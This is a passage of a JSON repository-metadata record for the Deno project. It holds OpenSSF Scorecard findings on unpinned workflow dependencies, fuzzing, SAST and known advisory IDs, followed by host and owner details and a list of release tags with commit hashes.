GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2